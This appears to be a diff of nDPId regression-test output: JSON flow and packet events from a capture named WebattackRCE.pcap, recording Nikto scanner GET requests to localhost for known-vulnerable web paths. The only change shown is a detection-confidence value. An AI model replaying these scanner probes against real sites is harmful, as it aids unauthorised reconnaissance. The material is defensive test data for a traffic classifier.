-01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/cvbeans\/beaninfo.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000014)"}} +01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/cvbeans\/beaninfo.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000014)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1576420277491,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277491,"pkt":"AAAAAAAAAAAAAAAACABFAADVNLZAAEAGB2t\/AAABfwAAAcWQH5BQIAxp\/aIKGoAYAED+yQAAAQEICp1m\/hudZv4bR0VUIC9jZmRvY3MvZXhhbXBsZXMvcGFya3MvZGV0YWlsLmNmbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/parks\/detail.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000015)"}} +01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/parks\/detail.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000015)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1576420277492,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277492,"pkt":"AAAAAAAAAAAAAAAACABFAAC8BNZAAEAGN2R\/AAABfwAAAcWSH5DUDzwKrTgLpoAYAED+sAAAAQEICp1m\/hydZv4cR0VUIC9rYm9hcmQvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/kboard\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000016)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/kboard\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000016)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1576420277495,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277495,"pkt":"AAAAAAAAAAAAAAAACABFAADBe7BAAEAGwIR\/AAABfwAAAcWUH5BTWUN0U4buRIAYAED+tQAAAQEICp1m\/h6dZv4eR0VUIC9saXN0cy9hZG1pbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/lists\/admin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000017)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/lists\/admin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000017)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1576420277496,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277496,"pkt":"AAAAAAAAAAAAAAAACABFAADEE4xAAEAGKKZ\/AAABfwAAAcWWH5AfSitVmmsDJoAYAED+uAAAAQEICp1m\/iCdZv4gR0VUIC9zcGxhc2hBZG1pbi5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxOCkNCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/splashAdmin.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000018)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/splashAdmin.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000018)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1576420277497,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277497,"pkt":"AAAAAAAAAAAAAAAACABFAAC8mG1AAEAGo8x\/AAABfwAAAcWYH5Bl4KC2nOMxboAYAED+sAAAAQEICp1m\/iGdZv4hR0VUIC9zc2RlZnMvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ssdefs\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000019)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ssdefs\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000019)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1576420277498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277498,"pkt":"AAAAAAAAAAAAAAAACABFAAC88otAAEAGSa5\/AAABfwAAAcWaH5CxdspY+6ys9YAYAED+sAAAAQEICp1m\/iKdZv4iR0VUIC9zc2hvbWUvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sshome\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000020)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sshome\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000020)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1576420277499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"thread_ts_msec":1576420277499,"pkt":"AAAAAAAAAAAAAAAACABFAAC61XNAAEAGZsh\/AAABfwAAAcWcH5BK5u2wb4yQmIAYAED+rgAAAQEICp1m\/iOdZv4jR0VUIC90aWtpLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIxKQ0KDQo="} -01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000021)"}} +01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000021)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 